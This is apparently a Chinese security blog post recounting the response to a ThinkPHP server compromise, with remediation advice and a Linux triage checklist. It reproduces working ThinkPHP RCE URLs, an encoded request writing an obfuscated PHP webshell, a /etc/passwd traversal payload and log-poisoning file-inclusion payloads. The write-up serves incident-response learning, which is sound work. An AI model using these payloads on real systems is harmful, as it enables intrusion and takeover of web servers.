linux绝育玩客云_记一次linux应急响应

缘由：收到阿里云的告警信息——服务器被入侵

。。。

来 直接切入正题

---

开始收到阿里云服务器的告警信息。

  

详情

 

上服务器查看文件，确定为加密的过狗马

 

进一步排查grep -rn “ma.php” 按关键字查找 发现post包，上传ma.php成功。

 

按关键ip查找：grep -rn 119.251.131.215

 

发现是利用tp的远程命令执行漏洞，写入木马文件。

复现

xxx/index.php?s=index/\think\Request/input&filter=phpinfo&data=1

 

在web下执行linux 命令ls，列出当前目录文件。

xxx/index.php?s=index/\think\Request/input&filter=exec&data=ls

 

在web下执行linux 命令pwd，显示当前路径。

 

确定可以执行命令。写入木马文件.

xxx/index.php?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3c%3f%70%68%70%20%0a%63%6c%61%73%73%20%57%6c%69%48%20%7b%20%0a%20%20%20%20%66%75%6e%63%74%69%6f%6e%20%5f%5f%64%65%73%74%72%75%63%74%28%29%20%7b%0a%09%09%24%4c%73%4f%78%3d%22%5c%78%39%66%5c%78%36%38%5c%78%66%63%5c%78%61%65%5c%78%61%31%5c%78%61%5c%78%33%30%5c%78%32%38%5c%78%31%39%5c%78%65%64%5c%78%64%34%5c%78%33%30%5c%78%36%63%5c%78%65%66%5c%78%61%30%22%5e%22%5c%78%66%63%5c%78%31%61%5c%78%39%39%5c%78%63%66%5c%78%64%35%5c%78%36%66%5c%78%36%66%5c%78%34%65%5c%78%36%63%5c%78%38%33%5c%78%62%37%5c%78%34%34%5c%78%35%5c%78%38%30%5c%78%63%65%22%3b%0a%09%09%40%24%4c%73%4f%78%3d%24%4c%73%4f%78%28%27%27%2c%24%74%68%69%73%2d%3e%44%63%29%3b%0a%20%20%20%20%20%20%20%20%72%65%74%75%72%6e%20%40%24%4c%73%4f%78%28%29%3b%0a%20%20%20%20%7d%0a%7d%0a%24%77%6c%69%68%20%3d%20%6e%65%77%20%57%6c%69%48%28%29%3b%0a%40%24%77%6c%69%68%2d%3e%44%63%20%3d%20%24%5f%50%4f%53%54%5b%27%73%6c%65%65%70%27%5d%3b%0a%3f%3e

(此处利用也可以常规的反弹shell，如py反弹、php反弹等，telnet反弹都成。进而拿到shell。尝试过这个方法拿到的shell是www权限，可以通过越权成为root。其实www权限也不会影响我们用wget命令下载后门)

检查服务器，成功写入shell.php

 

Shell.php 内容为一句话木马，密码“sleep”

 

连接木马后门后，在/phpmyadmin_xxx/js/pmd/ 目录下上传大马“ma.php”

 

 

已删除木马后门

 

之后用某盾和某服的webshell查杀工具检查源码，无异常，已配合开发修改代码。

参考修复方式：

一、SQL以及HTML标签，代码过滤

// 默认全局过滤方法 用逗号分隔多个

 'default_filter' => 'htmlspecialchars,addslashes,strip_tags'

添加全局配置文件config.php。

       后台需要用到富文本编辑器的地方字段存入数据库前需要转义，转义方法如下htmlspecialchars_decode($data['content']);htmlspecialchars_decode(转义字串);

二、防止public下php代码运行在public/upload目录下新建 .htaccess 文件写入一下代码

Order allow,deny

Deny from all

同时顺手看了看其他的漏洞

1、任意文件读取(目录遍历)

xxx/index.php?s=index/\think\Request/input&filter=think\__include_file&server[]=-1&data=../../../../etc/passwd

尝试用../../不断返回上层

查看到/etc/passwd

 

查看hostname

 

2、文件包含

尝试把木马写入日志。?s=index/\think\Request/input&filter=<?php eval($_POST[xxx];)?>&data=1

 

查看服务器日志

 

尝试日志包含

成功包含日志(25号日志)。弹出phpinfo

http://xxx/index.php?s=index/\think\Request/input&filter=think\__include_file&server[]=-1&data=./../runtime/log/201907/25.log

此时可以写入一句话，本地包含自己写马，远程包含却绝育服务器配置，开启了即可以远程包含。

图片马包含同理。

 继续检查有无挖矿程序

---

Linux服务器应急排查 

1、文件排查

1.1检查用户

无多于用户存在

 

1.2查看tmp临时目录下的文件

无异常文件

 

1.3查看开机启动项内容

无异常

 

1.4查看服务器命令操作记录

无敏感命令的操作

 

1.5查找根目录下24小时新增的文件

系统根目录一级网站根目录无可疑文件

都是缓存文件，把当天的删除清空，防止文件包含漏洞

2、进程排查

2.1无可疑ip以及建立的可疑链接。

 

2.2查看进程

无异常。

 

3、日志排查

3.1检查access日志

见以上入侵分析

3.2查看用户最近一次登陆的信息

除了本地root用户有登陆，其他无异常

 

3.3 查看用户错误登录的列表

 

shell界面占满，存在ssh爆破行为

3.4查看用户最近登录信息

 

正常访问

---

本次主要是分享了linux的应急排查的主要过程，同时增加了目录遍历以及文件包含的分享。仅做技术交流，有兴趣可以关注我的公众号——“浅渊安全”，一起探讨信息安全的知识~